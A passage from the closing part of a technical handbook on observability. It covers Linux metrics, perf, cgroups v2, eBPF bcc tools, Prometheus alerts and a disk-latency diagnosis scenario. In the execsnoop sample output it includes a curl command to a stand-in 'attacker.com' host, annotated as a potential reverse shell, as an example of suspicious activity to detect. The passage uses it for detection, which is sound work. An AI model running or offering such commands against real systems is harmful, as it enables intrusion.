rate(node_disk_io_time_seconds_total{device="nvme0n1"}[5m])
# Alert on disk approaching saturation
- alert: DiskIOUtilizationHigh
expr: rate(node_disk_io_time_seconds_total[5m]) > 0.9
for: 10m
labels:
severity: warning
annotations:
summary: "Disk {{ $labels.device }} on {{ $labels.instance }} utilization > 90%"
```
|Metric|/proc Source|node_exporter Metric|iostat Equivalent|Meaning|
|---|---|---|---|---|
|Read IOPS|`/proc/diskstats` col 4|`rate(node_disk_reads_completed_total[5m])`|`r/s`|Read operations per second|
|Write IOPS|`/proc/diskstats` col 8|`rate(node_disk_writes_completed_total[5m])`|`w/s`|Write operations per second|
|Read throughput|`/proc/diskstats` col 6|`rate(node_disk_read_bytes_total[5m])`|`rkB/s`|Read bandwidth|
|Write throughput|`/proc/diskstats` col 10|`rate(node_disk_written_bytes_total[5m])`|`wkB/s`|Write bandwidth|
|I/O time|`/proc/diskstats` col 13|`rate(node_disk_io_time_seconds_total[5m])`|`%util / 100`|Fraction of time device busy|
|I/O queue depth|`/proc/diskstats` col 14|`node_disk_io_time_weighted_seconds_total`|`avgqu-sz`|Average request queue depth|
|I/O latency|Derived|io_time / (reads + writes)|`await`|Average I/O service time|
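The derived `await` in the last row is worth making concrete: it is the delta of accumulated I/O time divided by the delta of completed I/Os between two snapshots. A sketch against `/proc/diskstats` lines (synthetic values; field positions follow the kernel's documented diskstats layout):

```python
def await_ms(snap_t0: str, snap_t1: str) -> float:
    """iostat-style `await` from two /proc/diskstats lines for one device:
    (delta read ms + delta write ms) / (delta reads + delta writes)."""
    def parse(line: str):
        f = line.split()
        # 0-indexed fields after split: 3=reads completed, 6=ms spent reading,
        # 7=writes completed, 10=ms spent writing
        return int(f[3]), int(f[6]), int(f[7]), int(f[10])

    r0, rt0, w0, wt0 = parse(snap_t0)
    r1, rt1, w1, wt1 = parse(snap_t1)
    ios = (r1 - r0) + (w1 - w0)
    return ((rt1 - rt0) + (wt1 - wt0)) / ios if ios else 0.0

# Synthetic snapshots: +100 reads (+400 ms), +50 writes (+300 ms)
s0 = "259 0 nvme0n1 1000 0 80000 5000 500 0 40000 3000 0 7000 8000"
s1 = "259 0 nvme0n1 1100 0 88000 5400 550 0 44000 3300 0 7400 8500"
print(await_ms(s0, s1))  # 700 ms / 150 I/Os ≈ 4.67 ms average
```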
**perf**
`perf` is the Linux performance analysis framework. It interfaces with hardware performance counters (PMU), software events, and kernel tracepoints to provide function-level profiling without application code modification.
```bash
# Live per-process CPU usage at function level
perf top
# Record 10 seconds of all-process CPU profiling
perf record -F 99 -a -g -- sleep 10
# Generate text report of hottest functions
perf report --stdio | head -30
# Generate FlameGraph data (with Brendan Gregg's FlameGraph scripts)
perf script | stackcollapse-perf.pl | flamegraph.pl > cpu_flamegraph.svg
# Profile specific process
perf record -F 99 -p $(pgrep payment-service) -g -- sleep 30
perf report --stdio
# Count hardware events (cache misses, branch mispredictions)
perf stat -e cache-misses,cache-references,branch-misses,instructions \
-p $(pgrep payment-service) -- sleep 10
```
CPU flame graphs produced by `perf` are the most effective tool for identifying CPU-bound performance problems. They show the exact call stacks consuming CPU time, weighted by the fraction of samples where each frame was on the stack. A wide bar at the top of the flame graph indicates a hot code path. Finding the widest top-level function and optimizing it produces the largest performance improvement.
### cgroups v2 Observability
Kubernetes uses cgroups v2 (on modern nodes) to enforce resource limits on containers. cgroup accounting provides per-container metrics independent of the container runtime:
```bash
# Find the cgroup path for a Kubernetes pod
systemd-cgls | grep -A2 payment-service
# Read CPU statistics for a container's cgroup
cat /sys/fs/cgroup/kubepods/pod<uid>/<container-id>/cpu.stat
# usage_usec 1234567890 ← Total CPU time consumed
# user_usec 987654321 ← User-space CPU time
# system_usec 246913569 ← Kernel-space CPU time
# nr_periods 9876543 ← Number of scheduler periods
# nr_throttled 1234 ← Periods where container was throttled
# throttled_usec 12345678 ← Total time throttled
# Memory statistics
cat /sys/fs/cgroup/kubepods/pod<uid>/<container-id>/memory.stat
# anon 1234567890          ← Anonymous memory (heap, stack)
# file 2345678901          ← File-backed memory (mmap, page cache)
# sock 123456              ← Socket buffers
# shmem 0
# inactive_anon 234567890
# active_anon 1000000000
# inactive_file 1234567890
# active_file 1111111011
# OOM kill events are reported in memory.events, not memory.stat
cat /sys/fs/cgroup/kubepods/pod<uid>/<container-id>/memory.events
# oom_kill 0               ← OOM kills (should always be 0)
```
**CPU throttling** — indicated by `nr_throttled` and `throttled_usec` in `cpu.stat` — is the cgroup-level equivalent of CPU saturation. When a container's CPU limit is set too low for its workload, the kernel throttles it: processes are suspended even though CPUs are idle elsewhere. This manifests as elevated application latency without any corresponding CPU utilization metric increase. It is one of the most common causes of unexplained latency in Kubernetes.
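The throttling ratio can also be computed directly from a `cpu.stat` snapshot during an incident; a sketch (sample counter values are invented):

```python
def throttle_ratio(cpu_stat_text: str) -> float:
    """Fraction of scheduler periods in which the cgroup was throttled,
    from a cgroup v2 cpu.stat snapshot (cumulative counters)."""
    stats = dict(line.split() for line in cpu_stat_text.splitlines() if line.strip())
    periods = int(stats["nr_periods"])
    return int(stats["nr_throttled"]) / periods if periods else 0.0

# Invented sample: throttled in 2500 of 10000 periods
sample = """\
usage_usec 1234567890
user_usec 987654321
system_usec 246913569
nr_periods 10000
nr_throttled 2500
throttled_usec 12345678
"""
print(throttle_ratio(sample))  # → 0.25
```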
Prometheus metric via cadvisor:
```promql
# CPU throttling ratio per container
rate(container_cpu_cfs_throttled_seconds_total{namespace="payments"}[5m])
/ rate(container_cpu_cfs_periods_total{namespace="payments"}[5m])
# Alert on high CPU throttling
- alert: ContainerCPUThrottling
expr: |
rate(container_cpu_cfs_throttled_seconds_total[5m])
/ rate(container_cpu_cfs_periods_total[5m])
> 0.25
for: 5m
labels:
severity: warning
annotations:
summary: "Container {{ $labels.container }} in {{ $labels.namespace }} throttled >25%"
description: "CPU limit is too low for this workload. Consider increasing the CPU limit or optimizing the application."
```
### eBPF for Deep Linux Observability
eBPF enables Linux system observability at a depth not achievable with traditional tools:
**execsnoop** — traces every process execution system-wide:
```bash
/usr/share/bcc/tools/execsnoop
# PCOMM PID PPID RET ARGS
# sh 1234 1233 0 /bin/sh -c curl -s http://... ← unexpected curl from container
# curl 1235 1234 0 curl -s http://attacker.com ← potential reverse shell
```
**opensnoop** — traces every file open call:
```bash
/usr/share/bcc/tools/opensnoop -p $(pgrep payment-service)
# PID COMM FD ERR PATH
# 1234 payment 10 0 /etc/ssl/certs/ca-certificates.crt
# 1234 payment 11 0 /app/config/database.yaml
# 1234 payment -1 2 /app/config/secrets.yaml ← ENOENT - missing file
```
**biolatency** — I/O latency histogram at the block device level:
```bash
/usr/share/bcc/tools/biolatency -D
# Tracing block device I/O... Hit Ctrl-C to end.
# nvme0n1
# usecs : count distribution
# 0 -> 1 : 0 | |
# 2 -> 3 : 45 |**** |
# 4 -> 7 : 3456 |**********************|
# 8 -> 15 : 12345 |********************|
# 16 -> 31 : 4567 |**** |
# 256 -> 511 : 123 |* | ← outliers: worth investigating
# 1024 -> 2047 : 12 | |
```
**syscount** — system call rate by type:
```bash
/usr/share/bcc/tools/syscount -p $(pgrep payment-service)
# SYSCALL COUNT
# epoll_wait 45678
# read 23456
# write 12345
# sendto 8901
# recvfrom 8765
# futex 23456 ← high futex count may indicate lock contention
```
**Integration with Prometheus via eBPF exporter:**
All the above bcc tools produce output suitable for ad-hoc investigation. For continuous monitoring and alerting, the ebpf_exporter (Cloudflare) converts eBPF metrics to Prometheus format, and tools like Parca and Pyroscope continuously profile processes and store profiling data as time series alongside metrics.
### Linux Observability Architecture
The complete Linux observability stack, showing how kernel telemetry flows to Prometheus and Grafana:
```
┌─────────────────────────────────────────────────────┐
│ Linux Kernel │
│ │
│ ┌──────────┐ ┌──────────┐ ┌────────────────┐ │
│ │ /proc │ │ cgroups │ │ eBPF subsystem│ │
│ │ /sys │ │ v2 │ │ (kprobes, │ │
│ │ /dev │ │ │ │ tracepoints) │ │
│ └─────┬────┘ └────┬─────┘ └───────┬────────┘ │
└────────┼────────────┼────────────────┼─────────────┘
│ │ │
▼ ▼ ▼
┌─────────────────────────────────────────────────────┐
│ Collection Layer │
│ │
│ node_exporter cAdvisor ebpf_exporter│
│ (reads /proc, (reads cgroup (attaches eBPF│
│ /sys, /dev) metrics) programs) │
│ │ │ │ │
│ └───────────────────┴───────────────────┘ │
│ │ │
│ /metrics HTTP endpoint │
└───────────────────────────┼──────────────────────────┘
│
│ Prometheus scrape (pull)
▼
┌─────────────────────────────────────────────────────┐
│ Prometheus │
│ │
│ Stores time series │
│ Evaluates alert rules │
│ Exposes HTTP API │
└───────────────────────────┬─────────────────────────┘
│
┌─────────────┼─────────────┐
▼ ▼ ▼
Grafana Alertmanager Remote Write
(dashboards) (routing) → Mimir
```
### Linux System Observability Metrics Reference
|Metric|Source in Kernel|node_exporter Metric|Classic Tool|Alert Threshold|
|---|---|---|---|---|
|CPU user%|`/proc/stat` user|`rate(node_cpu_seconds_total{mode="user"}[5m])`|top %us|> 80% sustained|
|CPU system%|`/proc/stat` system|`rate(node_cpu_seconds_total{mode="system"}[5m])`|top %sy|> 30% (unexpected)|
|CPU iowait%|`/proc/stat` iowait|`rate(node_cpu_seconds_total{mode="iowait"}[5m])`|top %wa|> 20%|
|CPU steal%|`/proc/stat` steal|`rate(node_cpu_seconds_total{mode="steal"}[5m])`|top %st|> 5% (VM host overload)|
|Load average 1m|`/proc/loadavg`|`node_load1`|uptime, top|> CPU count|
|Memory available|`/proc/meminfo`|`node_memory_MemAvailable_bytes`|free -m|< 10% of total|
|Memory used%|`/proc/meminfo`|`1 - node_memory_MemAvailable_bytes / node_memory_MemTotal_bytes`|free -m|> 90%|
|Swap used|`/proc/meminfo`|`node_memory_SwapTotal_bytes - node_memory_SwapFree_bytes`|free -m|> 0 in containers|
|Page faults|`/proc/vmstat`|`rate(node_vmstat_pgmajfault[5m])`|vmstat|Major faults > 0 in prod|
|Disk IOPS|`/proc/diskstats`|`rate(node_disk_reads_completed_total[5m]) + rate(node_disk_writes_completed_total[5m])`|iostat r/s, w/s|Varies by device|
|Disk latency|`/proc/diskstats`|Derived: io_time / (reads+writes)|iostat await|> 20ms for SSD|
|Disk util%|`/proc/diskstats`|`rate(node_disk_io_time_seconds_total[5m])`|iostat %util|> 80% sustained|
|Filesystem used%|`statfs()` syscall|`1 - node_filesystem_avail_bytes / node_filesystem_size_bytes`|df -h|> 85%|
|inode used%|`statfs()` syscall|`1 - node_filesystem_files_free / node_filesystem_files`|df -i|> 90%|
|Network RX rate|`/proc/net/dev`|`rate(node_network_receive_bytes_total[5m])`|sar -n DEV|Near NIC capacity|
|Network TX rate|`/proc/net/dev`|`rate(node_network_transmit_bytes_total[5m])`|sar -n DEV|Near NIC capacity|
|Network errors|`/proc/net/dev`|`rate(node_network_receive_errs_total[5m])`|ip -s link|> 0|
|TCP retransmits|`/proc/net/snmp`|`rate(node_netstat_Tcp_RetransSegs[5m])`|ss -s|> 0.1% of segments|
|conntrack entries|`/proc/sys/net/netfilter`|`node_nf_conntrack_entries`|conntrack -L|> 75% of max|
|Open file descriptors|`/proc/sys/fs/file-nr`|`node_filefd_allocated`|cat /proc/sys/fs/file-nr|> 70% of max|
|Processes in D state|`/proc/stat` procs_blocked|`node_procs_blocked`|ps aux (STAT D)|> 0 (investigate cause)|
|Zombie processes|`/proc/[pid]/stat`|`node_processes_state{state="Z"}` (needs `--collector.processes`)|ps aux|> 5|
|CPU throttling|cgroups v2 `cpu.stat`|`rate(container_cpu_cfs_throttled_seconds_total[5m])`|cat cpu.stat|> 25% of periods|
|Container OOM kills|cgroups v2 `memory.events`|`kube_pod_container_status_last_terminated_reason{reason="OOMKilled"} == 1`|kubectl describe pod|> 0|
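Several of these thresholds translate directly into Prometheus alerting rules. An illustrative rule group (alert names, `for` durations, and severity labels are examples, not part of any standard rule set):

```yaml
groups:
  - name: linux-system
    rules:
      - alert: HighIowait
        expr: avg by (instance) (rate(node_cpu_seconds_total{mode="iowait"}[5m])) > 0.20
        for: 10m
        labels:
          severity: warning
        annotations:
          summary: "{{ $labels.instance }} iowait above 20% for 10 minutes"
      - alert: FilesystemAlmostFull
        expr: (1 - node_filesystem_avail_bytes / node_filesystem_size_bytes) > 0.85
        for: 15m
        labels:
          severity: warning
        annotations:
          summary: "{{ $labels.instance }} {{ $labels.mountpoint }} above 85% used"
```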
### Production Scenario: Diagnosing Mysterious Application Latency
A payment service's p99 latency increases from 150ms to 800ms at 14:00. No deployment occurred. Error rate is unchanged. The following investigation uses Linux system observability to find the root cause.
**Step 1: Correlate with system metrics at 14:00**
```promql
# Was iowait elevated?
rate(node_cpu_seconds_total{mode="iowait",instance=~"payment-node.*"}[5m])
# → Yes, jumped from 2% to 35% at 14:01
# Was load average elevated?
node_load1{instance=~"payment-node.*"}
# → Jumped from 4 to 18 at 14:01 (nodes have 8 CPUs, so load is over 2× core count)
```
**Step 2: Correlate with disk metrics**
```promql
# Disk utilization
rate(node_disk_io_time_seconds_total{instance=~"payment-node.*"}[5m])
# → nvme0n1 at 98% utilization from 14:01
# Disk latency
rate(node_disk_read_time_seconds_total{instance=~"payment-node.*"}[5m])
/ rate(node_disk_reads_completed_total{instance=~"payment-node.*"}[5m])
# → Read latency 180ms (normal: 0.5ms) — severe disk I/O queuing
```
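The latency derivation above is the same arithmetic that iostat performs on `/proc/diskstats` counters: milliseconds spent reading divided by reads completed, over an interval. A minimal sketch using two hypothetical `/proc/diskstats` sample lines taken one second apart (field 4 is reads completed, field 7 is milliseconds spent reading, per the kernel's iostats documentation; the values are fabricated to reproduce this scenario's 180ms):

```shell
# Two samples of the nvme0n1 line from /proc/diskstats, 1s apart (hypothetical values)
s1="259 0 nvme0n1 1000 0 80000 500 2000 0 160000 900 0 1200 1400"
s2="259 0 nvme0n1 1010 0 80800 2300 2005 0 160400 960 0 1210 3265"

# Delta of reads completed (field 4) and ms spent reading (field 7)
reads=$(( $(echo "$s2" | awk '{print $4}') - $(echo "$s1" | awk '{print $4}') ))
ms=$((    $(echo "$s2" | awk '{print $7}') - $(echo "$s1" | awk '{print $7}') ))

echo "avg read await: $(( ms / reads )) ms"
# → avg read await: 180 ms
```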
**Step 3: Identify which process is causing disk I/O**
```bash
# On the affected node:
iostat -x 1 | grep nvme0n1 # Confirm saturation
# Identify top I/O processes
iotop -bo --iter=5
# PID PRIO USER DISK READ DISK WRITE SWAPIN IO> COMMAND
# 23456 be/4 root 0.00 B/s 98.50 M/s 0.00 % 99.94 % postgres: autovacuum worker [transactions]
# 1234 be/4 app 1.23 M/s 456.0 KB/s 0.00 % 0.06 % payment-service
```
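Where iotop is not installed, the same per-process attribution is available from `/proc/[pid]/io`, which accumulates the bytes each process actually pushes to the block layer (sampling it twice yields a rate). A minimal sketch, using the shell's own PID as a stand-in for a suspect process:

```shell
# /proc/[pid]/io exposes cumulative block-layer I/O per process
# (requires CONFIG_TASK_IO_ACCOUNTING, enabled on mainstream distro kernels).
pid=$$   # substitute the PID of the suspect process
grep -E '^(read_bytes|write_bytes)' /proc/$pid/io
```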
**Root cause identified:** PostgreSQL autovacuum running an aggressive vacuum on the `transactions` table is saturating the disk I/O subsystem. The payment-service database queries are queuing behind autovacuum I/O. Application latency is elevated not because the application or database query is slow, but because disk I/O is saturated by a background maintenance process.
**Remediation:** Configure autovacuum cost limits (`autovacuum_vacuum_cost_delay`, `autovacuum_vacuum_cost_limit`) to rate-limit autovacuum I/O. Alternatively, schedule autovacuum for off-peak hours or move the PostgreSQL data directory to a higher-throughput storage device.
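Cost-based throttling can be set globally in `postgresql.conf` (or per table via storage parameters); the values below are illustrative starting points to be tuned against observed I/O headroom, not recommendations:

```ini
# postgresql.conf — rate-limit autovacuum I/O (illustrative values)
autovacuum_vacuum_cost_delay = 10ms   # sleep this long each time the cost limit is reached
autovacuum_vacuum_cost_limit = 200    # I/O "cost" accumulated before each sleep
```

Raising the delay or lowering the limit slows autovacuum down; the trade-off is that vacuum work takes longer to complete, so table bloat must be watched while tuning.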
This root cause would have been completely invisible to application-level observability. The database queries appeared slow; the application appeared healthy. Only Linux-level I/O observability (iowait metric, disk utilization, iotop) revealed the actual cause.
---
## Conclusion
Building and operating a production-grade observability platform is a continuous engineering effort, not a one-time installation. The technologies covered in this handbook — Prometheus, Grafana, OpenTelemetry, Loki, Tempo, Mimir — are individually powerful and collectively form a complete observability system capable of operating at any scale, from a single service to a multi-cluster, multi-region distributed platform.
Several principles should guide implementation decisions:
**Instrument everything, store selectively.** Application code should emit comprehensive telemetry. The collection layer (OTel Collector) applies sampling, filtering, and aggregation to make storage costs proportional to value.
**Correlation is the multiplier.** Metrics, logs, and traces are individually useful but are exponentially more powerful when correlated — trace IDs in logs, exemplars linking metrics to traces, log-to-trace navigation in Grafana. Design the instrumentation to support correlation from day one.
**Observability is owned by application teams.** Platform teams provide the infrastructure; application teams define their SLOs, write their alert rules, build their dashboards, and maintain their runbooks. Centralized observability without distributed ownership creates bottlenecks and knowledge gaps.
**Test the observability, not just the system.** Regularly validate that alerts fire when they should, that runbooks are accurate, and that traces propagate correctly across service boundaries. Observability infrastructure that is not tested will fail when it is most needed.
**Treat observability as code.** Dashboard definitions, alert rules, recording rules, and OTel Collector configurations should all be in version control, reviewed, and deployed through the same CI/CD processes as application code.
The engineer who builds observability infrastructure well gives their entire organization the ability to understand and improve their systems continuously. That capability — the ability to answer "what is happening and why?" for any system at any time — is the foundation of everything else in modern infrastructure operations.
---
_Handbook version 1.0 — March 2026. Technology versions current as of Prometheus 2.50, Grafana 10.4, OpenTelemetry Collector Contrib 0.97, Grafana Loki 3.0, Grafana Tempo 2.4, Grafana Mimir 2.11. All configuration examples are illustrative and should be adapted to specific organizational requirements._